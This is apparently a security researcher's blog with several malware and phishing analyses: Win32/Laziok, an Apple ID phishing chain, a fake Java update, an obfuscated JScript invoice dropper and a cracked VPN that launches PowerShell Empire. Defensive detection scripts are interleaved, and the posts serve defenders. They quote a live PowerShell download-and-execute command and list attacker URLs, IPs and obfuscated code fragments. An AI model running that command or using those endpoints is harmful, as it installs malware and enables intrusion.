Friday, 12 January 2018

Win32/Laziok malware – Cybersecurity research

This post is about the Win32/Laziok malware.
It does not matter where I found it.
Its hidden activity is very intense: it seeks to install itself, tries to disable the antivirus, modifies the Registry, scans for installed software, etc.

The .exe file is named smss, and I found it under the same name in another AV report. It seems it was first detected and named Win32/Laziok in 01.2015, but no one has written a clear report about it.

After running the backdoored software, smss.exe starts running in the background, preparing a good environment for itself.
It scans the whole system to find the computer's protection software.
The infected smss file is hidden in the \Application Data\System\Oracle directory, and not just hidden but super hidden.
It is easy to overlook because the original smss.exe is a Windows process.
It tries to connect to a server hosting the swoleoil.co domain.
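A practical check for the masquerading described above, added here as an example (it is not code from the original post): compare each process's image path against the location where that system binary is expected to live. The expected-path table and the process records are constructed for the example; the second record uses the directory named in this post.

```python
# Added example: flag system-binary names (smss.exe, svchost.exe, ...) that run
# from a directory other than the one the real binary lives in.
# EXPECTED_PATHS is a deliberately small, assumed table; SAMPLE_PROCESSES is
# constructed telemetry in the shape of (pid, image name, image path).

# Legitimate image paths, lowercase, for a few commonly impersonated binaries.
EXPECTED_PATHS = {
    "smss.exe": {r"c:\windows\system32\smss.exe"},
    "csrss.exe": {r"c:\windows\system32\csrss.exe"},
    "svchost.exe": {r"c:\windows\system32\svchost.exe",
                    r"c:\windows\syswow64\svchost.exe"},
    "explorer.exe": {r"c:\windows\explorer.exe"},
}


def normalize_path(path: str) -> str:
    """Lower-case a Windows path and resolve the usual SystemRoot spellings
    (assumes the system drive is C:)."""
    p = path.strip().strip('"').lower().replace("/", "\\")
    if p.startswith("\\\\?\\"):          # strip the \\?\ long-path prefix
        p = p[4:]
    for alias in ("%systemroot%", "%windir%", "\\systemroot"):
        if p.startswith(alias):
            p = "c:\\windows" + p[len(alias):]
    while "\\\\" in p:                   # collapse doubled separators
        p = p.replace("\\\\", "\\")
    return p


def check_process(name: str, image_path: str):
    """Return a finding string if `name` is a known system binary running
    from an unexpected path, otherwise None."""
    expected = EXPECTED_PATHS.get(name.lower())
    if expected is None:
        return None                      # no rule for this image name
    if normalize_path(image_path) in expected:
        return None                      # running from a legitimate location
    return f"{name} running from unexpected path: {image_path}"


def find_masquerading(processes):
    """Apply check_process to (pid, name, path) records; return (pid, finding)."""
    findings = []
    for pid, name, path in processes:
        finding = check_process(name, path)
        if finding:
            findings.append((pid, finding))
    return findings


# Constructed sample telemetry; pid 2816 uses the directory named in the post.
SAMPLE_PROCESSES = [
    (400, "smss.exe", r"\SystemRoot\System32\smss.exe"),
    (2816, "smss.exe", r"C:\Documents and Settings\user\Application Data\System\Oracle\smss.exe"),
    (904, "svchost.exe", r"%SystemRoot%\System32\svchost.exe"),
    (3012, "svchost.exe", r"C:\Users\user\AppData\Roaming\svchost.exe"),
    (1560, "notepad.exe", r"C:\Windows\System32\notepad.exe"),
]

if __name__ == "__main__":
    for pid, finding in find_masquerading(SAMPLE_PROCESSES):
        print(pid, finding)
```

On a live host the same comparison can be fed from `Get-Process smss | Select-Object Id, Path` in PowerShell; a copy that lives under Application Data rather than System32 stands out immediately, whatever its file attributes say.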
  • URL: hxxp://87.121.52.228/panel/includes/verif.php
    TYPE: GET
    USER AGENT: None
  • Organization: Neterra Ltd.
  • Country: Bulgaria
  • Detection ratio: 43/67 at this moment.
  • MD5: 0947e4f35f823b37fd8352e643d6cf8c
  • SHA1: 79b183a761470c3e3662ab64004072c70131a815

  • hxxp://87.121.52.228/panel/includes/country.php
  • hxxp://87.121.52.228/panel/includes/idcontact.php
  • hxxp://87.121.52.228/panel/includes/post.php
  • hxxp://87.121.52.228/panel/includes/verif.php
  • hxxp://87.121.52.228/panel/includes/chromix.exe
Domain: swoleoil.co
Registrar: Key-Systems GmbH
Registration Date: 2014-05-08
Expiration Date: 2018-05-07
Updated Date: 2017-06-22
Status: ok
Name Servers: carter.ns.cloudflare.com / gwen.ns.cloudflare.com
The server seems to be empty at this time.
That’s all about this malware.
Source: Prodefence.org
Have fun & Stay safe!

Friday, 29 December 2017

Malware analysis and investigation services

Alexandru Anghelus – Malware analyst & investigator


Security of your personal data is very important.
Also sensitive Company data is extremely important.
If you’ve got a file and it looks suspicious, do not open it.
The .zip, .exe, .rtf, .doc, .htm, .rar, etc. files can be infected, and personal data may become public or be used against you.
With my analysis services you can remove that insecurity!
Analyzing a file can take a few minutes or even hours.
Investigating what is found and drawing up the report may take longer, depending on the infected file.
Tracking the hacker may be impossible or may take several days.
Chances of success in discovering the infected file are 99%.
Full report services can help identify the reason, the target and whether it is a direct or random attack.
At the following address you can find some of my work in the field.

I am a malware analyst and investigator.
With my skills, anyone can get a clear picture of the suspicious files or emails they have on their PC.
I am the founder of the Professional Defence Community, a cybersecurity website running for 7 years.
Web Pentesting.
Malware analysis.
Malware investigator.


Freelancer services websites:
https://www.fiverr.com/alexmalware
https://www.upwork.com/freelancers/~01ec95393b79dc2f6b
https://www.freelancer.com/u/alexpdc

Social media:
https://www.facebook.com/alexarchitect
https://www.linkedin.com/in/anghelus-alexandru/
h**ps://twitter.com/AlexProdefence

Contact:
email: info@prodefence[.]org

Tuesday, 26 December 2017

11+ infected files from one .exe – Malware research

http://www.prodefence.org/11-infected-files-binded-in-one-malware-research/

“I do not think the file is infected …”
All of these are a part of the extracted files from a downloaded file.
All .exe files are VT detected … GET from url functions … POST on url functions … silent uploads / downloads … silent installs … and more …
There was so much activity that the CPU hit 100%.
I do not think it makes sense to analyze anything else here… it takes too long!


Have fun & Stay safe!
Prodefence.org

Monero & Stealer binded in the same file.

http://www.prodefence.org/monero-stealer-binded-in-the-same-file/

Looks like someone really wants a lot from the victims.
Files containing more than one piece of malware.
As usual, found on an illegal forum.


Unfinished Paypal phishing page?

http://www.prodefence.org/unfinished-paypal-phishing-page/

I’m starting to stop trusting hackers …
How can you start sharing it… if it is not done yet….. or are you just modifying something?
To come later?
Have fun & Stay safe!!!

Tuesday, 12 December 2017

Apple ID and Credit Card Phishing – Cybersecurity research


Hello.
Today we will be investigating a phishing case.
Usually this type of attack comes by email.
An email containing some text, a problem or a prize, and a link.
The text is written to make you go to the prepared website.
The link is usually hidden so you cannot figure out where you are going, which makes the hoax easier.

Let’s start with the email I received so you can understand how you can protect yourself.
  1. Re: to what? Is this a response to an email that I sent to Apple? NO! … It’s a trick used to make you open the email believing it’s a response to an email sent by you.
  2. Apple support…. It caught your attention.
  3. Yandex?!? Yandex Browser is a freeware web browser. But it is still important. The Apple CEO sent you an email after he hired Yandex… that's why he's CEO… to send emails to users…
A link is hidden behind the button.
t.co is Twitter's URL shortener, and behind this link is the real address we reach.

h**ps://t.co/BeOT0WkjXn =>
h**ps://twitter.com/safety/unsafe_link_warning?unsafe_link=https%3A%2F%2Fwia.email%2F =>
h**ps://apple.com.confirmation.account.centre.rin5de.center/
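The final hop above is the whole trick: the hostname starts with apple.com, but the part that was actually registered is rin5de.center. Here is an added example, not code from the original post, of how a mail gateway or browser extension can make that decision automatically: strip the URL down to its registrable domain and compare it with the brand the hostname is pretending to be. PUBLIC_SUFFIXES is a tiny constructed stand-in for the Public Suffix List and BRAND_DOMAINS a short assumed brand table; the redirect chain is the one shown above.

```python
# Added example: decide whether a hostname borrows a brand name while being
# registered under an unrelated domain, as the final hop above does.
# PUBLIC_SUFFIXES is a tiny constructed stand-in for the Public Suffix List and
# BRAND_DOMAINS a short assumed brand table; both would be larger in practice.
import re
from urllib.parse import urlparse

PUBLIC_SUFFIXES = {"com", "net", "org", "co", "uk", "co.uk", "center"}
BRAND_DOMAINS = {"apple": "apple.com", "paypal": "paypal.com"}

# Redirect chain from the post (t.co -> Twitter warning page -> phishing host).
REDIRECT_CHAIN = [
    "https://t.co/BeOT0WkjXn",
    "https://twitter.com/safety/unsafe_link_warning?unsafe_link=https%3A%2F%2Fwia.email%2F",
    "https://apple.com.confirmation.account.centre.rin5de.center/",
]


def registrable_domain(host: str) -> str:
    """Return the registrable domain (eTLD+1): the label just left of the
    longest public suffix that ends the hostname."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(1, len(labels)):            # longest suffix is tried first
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[i - 1:])
    return host.lower()


def classify_url(url: str) -> dict:
    """Flag a URL whose hostname contains a brand token but whose registrable
    domain is not that brand's real domain."""
    host = (urlparse(url).hostname or "").lower()
    reg = registrable_domain(host)
    tokens = set(re.split(r"[.-]", host))      # labels and hyphenated parts
    impersonates = sorted(b for b, real in BRAND_DOMAINS.items()
                          if b in tokens and reg != real)
    return {"host": host, "registrable_domain": reg,
            "impersonates": impersonates, "suspicious": bool(impersonates)}


def analyse_chain(chain) -> dict:
    """Classify every hop; the verdict is the last hop's, since a shortener
    or warning page in the middle says nothing about the destination."""
    hops = [classify_url(u) for u in chain]
    return {"hops": [h["host"] for h in hops], "final": hops[-1]}


if __name__ == "__main__":
    result = analyse_chain(REDIRECT_CHAIN)
    print(" -> ".join(result["hops"]))
    print(result["final"])
```

The brand token is matched against whole labels (split on dots and hyphens), so appleid.apple.com passes while apple.com.confirmation.account.centre.rin5de.center and paypal-secure-login.example.com are flagged. With the real Public Suffix List loaded, the same function handles cases such as foo.co.uk without special-casing.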
The good part is that when you are redirected, Twitter and Firefox warn you about the link you are about to reach.
Let’s ignore everything this time …
What you see is a clone of the Apple website.
I'm not in some cyber unit… yet….
Data entered on the fake page will be stored on the server.
So the hacker will know I've been around here.
Even if you log in with real data, you will receive the same message to move on.
It will ask you to enter bank details to unlock your account, plus an identification document.

After all, it redirects you to the real Apple website and you’ll sign in to your unlocked account.
At this point you will be glad you did not lose your account, but in reality you gave the hacker all your banking data + identification documents.

Still, let's see what's in the main domain.
h**ps://rin5de.center
Index of/ … apple.com.confirmation.account.centre: here is the clone page that was created (old and still online on 24.02.2017).
A cPanel and a hint for recovering the password.
153.92.209.145:2083
Username: admin
Password: ?
Email: m—d@m—v.com
Name Servers:
ns7.wixdns.net
ns6.wixdns.net

And today…after 10 months online…

The cPanel (153.92.209.145:2083)
I think the data I’ve entered was also convincing (Insider, cyberunit)
Have fun & Stay safe!!!

Sunday, 10 December 2017

Fake Java Update – Malware analysis


File hosted on: h**p://www.packagegiftnow.com/
As you already know, some websites have implemented a script that tells you that you have an old version of Java and gives you the ability to update.
Of course this is a fake update and what you will install on your computer will be a modified file.
This can be a virus, a trojan, adware, etc. The point is that it will 100% change something on your computer and you will become the victim. What it means to be a victim can be found in the previous articles.

VirusTotal shows some detections.
VirusTotal Report
I will open this “update” to analyze it.
It shows a nice message telling you that nothing is going on, but in the background things have already started to work…
The executable connects to:
ec2-54-77-123-135.eu-west-1.compute.amazonaws.com
…and after a few searches, I discovered that several domains were hosted at this address:
info.dinenowe.com
info.dlapplicationscontent.com
info.funworldsoftware.com
info.quickcleardl.com
info.townstocksign.com
info.universebestworld.com
All with reports for spam, malware, DDoS, etc.
It accesses many folders on your computer, even if it does not work…
Unfortunately, I do not have time for a more complex analysis today, but the basic idea is that this Java Update is not beneficial.
So be careful what you download and from whom!

Prodefence.org

Have fun & Stay safe!

Wednesday, 6 December 2017

Unseen sample of malware – Modified code – DarkWeb Tor project

Hello.
Today I had a nice surprise. I found in the Spam folder an email telling me they had just sent me an electronic invoice.
I have to say that the surprises keep coming.

You will see!!!

Part 1 – The infected file & dropped files

Dear Madam / Madam,
We would like to inform you that you have an electronic invoice issued. The attachment is an official accounting document and complies with the requirements of the Electronic Document and Electronic Signature Act.
If you have additional questions or need other information, please do not hesitate to contact us with the contact details on your electronic invoice.
Thank you for being a customer of ENERGO-PRO.
We wish you a successful day.
* This email can contain personalized information. If you are not the recipient for whom it is intended, please delete it. Thank you!
I have a file attached named öá¬ÔŃÓá No 0258923817 (3)… yeeep, and it is a JScript file.
Scanned with VirusTotal.

The -1 vote is mine! (lol).
So 0 of 60 antivirus engines detect this virus. In the previous article I wrote about the problem of detection:
Security Advice – The Antivirus is just a security helper!
Running the öá¬ÔŃÓá No 0258923817 (3) script injects VBScript code and tries to connect out.
All the connections made while running this script:
  • withadvertisingthe.com
  • myip.opendns.com
  • noreply.org
  • riseup.ne
  • Faravahar Tor Authority Directory – 199.254.238.52
  • Tor Exit Router – 178.16.208.59
  • vps.net
  • 91.219.237.154
  • digitalocean.com
  • voxility.net
All are Tor servers and VPN servers.
GET /tor/status-vote/current/consensus from hosts:
86.59.21.38/154.35.175.225
There are BitBlinder Project files (see GitHub for more information). Remember this… I will give you some good info later!
Connected servers:
5.149.213.224/86.59.21.38/199.254.238.52/154.35.175.225/178.16.208.59/46.23.72.81/91.219.237.154/46.101.183.160/93.115.84.143/165.227.130.167
What else to show you from this file…
Last write session:
It makes a lot of changes after running:
  • Remote Access: tries to identify its external IP address
  • Stealer/Phishing: scans for artifacts that may help identify the target
  • Touches instant-messenger-related registry keys
  • Persistence: injects into explorer
  • Injects into remote processes
  • Modifies auto-execute functionality by setting/creating a value in the registry
  • Spawns a lot of processes
  • Writes data to a remote process
Dropped files:
  • adprtext.dll
  • agreebowl.dll
Let’s see the agreebowl.dll

Part 2 – The “öá¬ÔŃÓá No 0258923817 (3)” file code.

The 0/60 detection rate is due to the way the code is written. The programmer used an ingenious way to write the code so that its signature differs from that of known viruses.
Here I will show you a part of the code:
```javascript
ozen.decideWorry+sickCityAdditionDepth[15]+seriousPaidRegion.happened;}function pigDutyUnusual(passForeignPush){return lowerCountryCharacter[5];}function frontFurtherAfterMadeConstruction(wasMoodCleanRefusedPush){return slightForgotDiscussionHistoryGiant[3]+temperatureBeforeDo.audienceCircus+evidenceCompositionCrackPrincipalEar[2]+seriousPaidRegion.engineer+sickCityAdditionDepth[3]+sickCityAdditionDepth[4]+breatheCupParentEscape[13]+biggerShellsDeterminePorchCreature[7]+temperatureBeforeDo.twoWest+importanceArtAgain[7];}function compareSpeciesGiantBuildingSeveral(excitedCanScoreCarefulFine){return roughWhenPlentyDistanceFrozen.decideWorry+townOrdinaryDarkFlowerLibrary.careful+importanceArtAgain[7]+temperatureBeforeDo.audienceCircus+wonProvideMostOrdinaryRoad.railroadOr+slightForgotDiscussionHistoryGiant[7]+importanceArtAgain[7]+evidenceCompositionCrackPrincipalEar[2]+breatheCupParentEscape[17];}var clearlyPieceBillEarlierOrganization=[];
clearlyPieceBillEarlierOrganization[todayBehaviorStrengthQuietlyTypical('p-_sI1owb)jB:o6')](visitorBehindSpeak('9
K0c0htw(o.kvr'));
var packageLargePig=[-314];
var tearsKitchenCatchNeck=[66];
var fifteenRunStraightSpeech=[];
var aidMirrorWeakProgressInclude=[7];
var sightDistanceDid=[1];
var taskAnywayHungry=[mightEmptyCarriedRapidlyOnce('26P:Y&kwgPLW0')];
function partRelatedBatBaby(metFreeSomeone){
```
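What defeats the signatures here is that every string is assembled at runtime from random-looking array elements and object properties, so no meaningful byte sequence exists in the file. As an added example (not code from the post or from the malware), here is a static heuristic a defender can use to triage scripts written in this style without a signature: it measures the traits of the string-assembly obfuscation (very long generated identifiers, long `+` chains between array elements and properties, many one-line functions that only return such a chain, and a single enormous line). The thresholds are assumptions; the obfuscated sample is a fragment of the code above and the benign sample is constructed.

```python
# Added example: score a script for the string-assembly obfuscation shown
# above. Regexes and thresholds are assumptions chosen for this style;
# OBFUSCATED_SAMPLE is a fragment of the post's code, BENIGN_SAMPLE is constructed.
import re

IDENT_RE = re.compile(r"[A-Za-z_]\w*")
# A fragment join looks like  name[3]+other.prop  (array element or property,
# a plus sign, then another array element or property).
FRAGMENT_JOIN_RE = re.compile(r"\w+(?:\[\d+\]|\.\w+)\s*\+\s*(?=\w+(?:\[\d+\]|\.\w+))")
# A one-line function whose whole body is a single return statement.
TRIVIAL_FN_RE = re.compile(r"function\s+\w+\s*\([^)]*\)\s*\{\s*return\s+[^;{}]{0,1000};\s*\}")
JS_KEYWORDS = {"function", "return", "var", "let", "const", "if", "else",
               "new", "this", "for", "while", "true", "false", "null"}


def obfuscation_metrics(script: str) -> dict:
    """Measure the traits that the string-assembly style leaves behind."""
    names = [i for i in IDENT_RE.findall(script) if i not in JS_KEYWORDS]
    return {
        "avg_identifier_length": sum(map(len, names)) / len(names) if names else 0.0,
        "fragment_joins": len(FRAGMENT_JOIN_RE.findall(script)),
        "trivial_functions": len(TRIVIAL_FN_RE.findall(script)),
        "longest_line": max((len(line) for line in script.splitlines()), default=0),
    }


def obfuscation_score(script: str):
    """Return (score 0..6, metrics); thresholds are assumptions, not a standard."""
    m = obfuscation_metrics(script)
    score = 0
    score += 2 if m["avg_identifier_length"] > 14 else 0   # generated multi-word names
    score += 2 if m["fragment_joins"] > 10 else 0           # strings built from fragments
    score += 1 if m["trivial_functions"] >= 3 else 0        # accessor functions per fragment
    score += 1 if m["longest_line"] > 500 else 0            # everything on one line
    return score, m


# Fragment of the code shown in the post (one physical line in the sample).
OBFUSCATED_SAMPLE = (
    "function pigDutyUnusual(passForeignPush){return lowerCountryCharacter[5];}"
    "function frontFurtherAfterMadeConstruction(wasMoodCleanRefusedPush){return "
    "slightForgotDiscussionHistoryGiant[3]+temperatureBeforeDo.audienceCircus+"
    "evidenceCompositionCrackPrincipalEar[2]+seriousPaidRegion.engineer+"
    "sickCityAdditionDepth[3]+sickCityAdditionDepth[4]+breatheCupParentEscape[13]+"
    "biggerShellsDeterminePorchCreature[7]+temperatureBeforeDo.twoWest+importanceArtAgain[7];}"
    "function compareSpeciesGiantBuildingSeveral(excitedCanScoreCarefulFine){return "
    "roughWhenPlentyDistanceFrozen.decideWorry+townOrdinaryDarkFlowerLibrary.careful+"
    "importanceArtAgain[7]+temperatureBeforeDo.audienceCircus+wonProvideMostOrdinaryRoad.railroadOr+"
    "slightForgotDiscussionHistoryGiant[7]+importanceArtAgain[7]+"
    "evidenceCompositionCrackPrincipalEar[2]+breatheCupParentEscape[17];}"
)

# Constructed benign script for comparison.
BENIGN_SAMPLE = """function add(a, b) {
  return a + b;
}
function greet(name) {
  return "Hello, " + name + "!";
}
var total = add(2, 3);
"""

if __name__ == "__main__":
    for label, sample in (("obfuscated", OBFUSCATED_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, obfuscation_score(sample))
```

A score like this is a triage aid, not a verdict: minified libraries also produce long lines, which is why that trait carries the least weight and the fragment-join count carries the most. The two dropped DLLs and the network activity listed earlier are what confirm the finding.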

Part 3 – BitBlinder project

BitBlinder project – A way to create your own hidden services on the DarkWeb.
Project-specific files:
  • http://154.35.175.225/tor/status-vote/current/consensus.js
  • http://91.219.237.154/tor/server/fp/6a7479eb4378b946dc2a65a7f2c706b42bae2ebd
Well… that was a long story, and the end is here!
0/60 … remember that!!!

Have fun & Stay safe!!!

Friday, 1 December 2017

Malware research/reverse – Payload backdoor

Hello.
I have some free time and I try to contribute to internet safety. I'm just a small drop in the ocean, but I'm here!
Today I will introduce you to something different.
As usual, I downloaded a few programs and started the analysis.
I have a "great offer":
Hotspot Shield VPN 7.20.8.Elite Cracked

Woooow!!!(just kidding)
We have 3 important files.
Setup.exe and Update.exe appear to be archive files, and from previous posts we know what this means, but today our target is the HSS v.2.exe file.



Notice that it is the most recently created file.
Also, the installation method requires using this file.

OK. Let's scan this time!
VirusTotal Report

20/68 detections?!?
I mean, only 20 of the antivirus applications see this file as a virus.


OK. It's normal for it to be seen by antivirus. It's just a crack, a patch, etc. You have to disable the antivirus to install it; it's just pirated software.
Let's get started.
It looks like this .exe is actually a .rar archive.

After opening, it does a lot of work in the background.
We let it do its job to find out what it is doing!


When everything is quiet, we see that something is left running.

powershell.exe -nop -windowstyle Hidden -c "IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1/raw/9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1')"
The virus runs through PowerShell.exe, connected to external sources:
h**ps://gist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1/raw/9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1
Also connecting to:
http://83.251.132.4
/admin/get.php
/login/process.php
/news.php
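The command line above is the classic PowerShell download cradle (hidden window, no profile, IEX of a DownloadString result), and the three paths that follow are the staging URIs the implant calls back to. As an added example, not code from the post or from the project it describes, here is how a defender can triage both in logs: score process-creation command lines for the cradle (including the same cradle hidden behind -EncodedCommand, which the post's sample does not use but which is the usual next step), and flag proxy destinations that receive more than one of the callback paths. All log lines are constructed; 198.51.100.7 and the gist.example.invalid URL are placeholders standing in for the real hosts named above.

```python
# Added example: triage process command lines for the PowerShell download
# cradle shown above and proxy logs for the callback URIs listed above.
# All log lines are constructed; 198.51.100.7 is a documentation address
# standing in for a real C2 host.
import base64
import re
from typing import Optional
from urllib.parse import urlparse

CRADLE_INDICATORS = {
    "invoke_expression": re.compile(r"(?i)(?<![\w-])(?:IEX|Invoke-Expression)\b"),
    "downloadstring":    re.compile(r"(?i)\.DownloadString\s*\("),
    "webclient":         re.compile(r"(?i)Net\.WebClient"),
    "hidden_window":     re.compile(r"(?i)-w[a-z]*\s+hidden"),      # -w / -windowstyle hidden
    "no_profile":        re.compile(r"(?i)-nop[a-z]*"),            # -nop / -noprofile
}
# -e/-enc/-EncodedCommand followed by a base64 blob (PowerShell accepts any prefix).
ENCODED_RE = re.compile(r"(?i)-e[a-z]*\s+([A-Za-z0-9+/=]{20,})")
URL_RE = re.compile(r"https?://[^\s'\"()]+")
# Callback paths from the post; /news.php alone is too generic, so a host is
# flagged only when at least two distinct paths are seen.
CALLBACK_PATHS = {"/admin/get.php", "/login/process.php", "/news.php"}


def decode_encoded_command(cmd: str) -> Optional[str]:
    """PowerShell -EncodedCommand carries base64 of UTF-16LE text."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_command(cmd: str) -> dict:
    """Scan the command line plus any decoded -enc payload for cradle traits."""
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else f"{cmd} {decoded}"
    hits = sorted(name for name, rx in CRADLE_INDICATORS.items() if rx.search(text))
    suspicious = ({"invoke_expression", "downloadstring"} <= set(hits)) or len(hits) >= 3
    return {"indicators": hits, "urls": URL_RE.findall(text),
            "encoded": decoded is not None, "suspicious": suspicious}


def suspicious_callbacks(proxy_lines) -> dict:
    """Group '<client> <method> <url>' lines by destination host; return hosts
    that received two or more of the callback paths."""
    seen = {}
    for line in proxy_lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        u = urlparse(parts[2])
        if u.path in CALLBACK_PATHS:
            seen.setdefault(u.hostname, set()).add(u.path)
    return {host: sorted(paths) for host, paths in seen.items() if len(paths) >= 2}


def _b64_utf16le(text: str) -> str:
    """Build an -EncodedCommand argument for the constructed sample below."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


SAMPLE_COMMANDS = [
    # shape of the command found in the post, with a placeholder URL
    "powershell.exe -nop -windowstyle Hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://gist.example.invalid/raw/stage1.ps1')\"",
    # the same cradle hidden behind -enc
    "powershell.exe -w hidden -enc " + _b64_utf16le(
        "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/news.php')"),
    # benign administrative use
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "powershell.exe -nop -w hidden -c \"Get-Date\"",
]
SAMPLE_PROXY_LINES = [
    "10.0.0.5 GET http://198.51.100.7/admin/get.php",
    "10.0.0.5 POST http://198.51.100.7/login/process.php",
    "10.0.0.5 GET http://198.51.100.7/news.php",
    "10.0.0.9 GET http://news.example.com/news.php",
    "10.0.0.9 GET http://news.example.com/index.php",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(triage_command(cmd))
    print(suspicious_callbacks(SAMPLE_PROXY_LINES))
```

The scoring deliberately treats a hidden window or -nop on their own as weak evidence (administrators use them), and only raises an alert when execution of downloaded content is visible or several traits coincide; the URLs extracted from a flagged command are what you then pivot on in the proxy logs.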

After investigating, I found out that this is a payload project: PowerShell Empire.

Currently PowerShell Empire has the following module categories:
  • Code Execution – Ways to run more code
  • Collection – Post exploitation data collection
  • Credentials – Collect and use creds
  • Exfiltration – Identify egress channels
  • Lateral Movement – Move around the network
  • Management – Host management and auxiliary
  • Persistence – Survive reboots
  • Privesc – Privilege escalation capabilities
  • Recon – Test further entry points (HTTP Basic Auth etc)
  • Situational Awareness – Network awareness
  • Trollsploit – For the lulz
Prodefence.org
What can I say …. be careful!
Have fun & stay safe!!!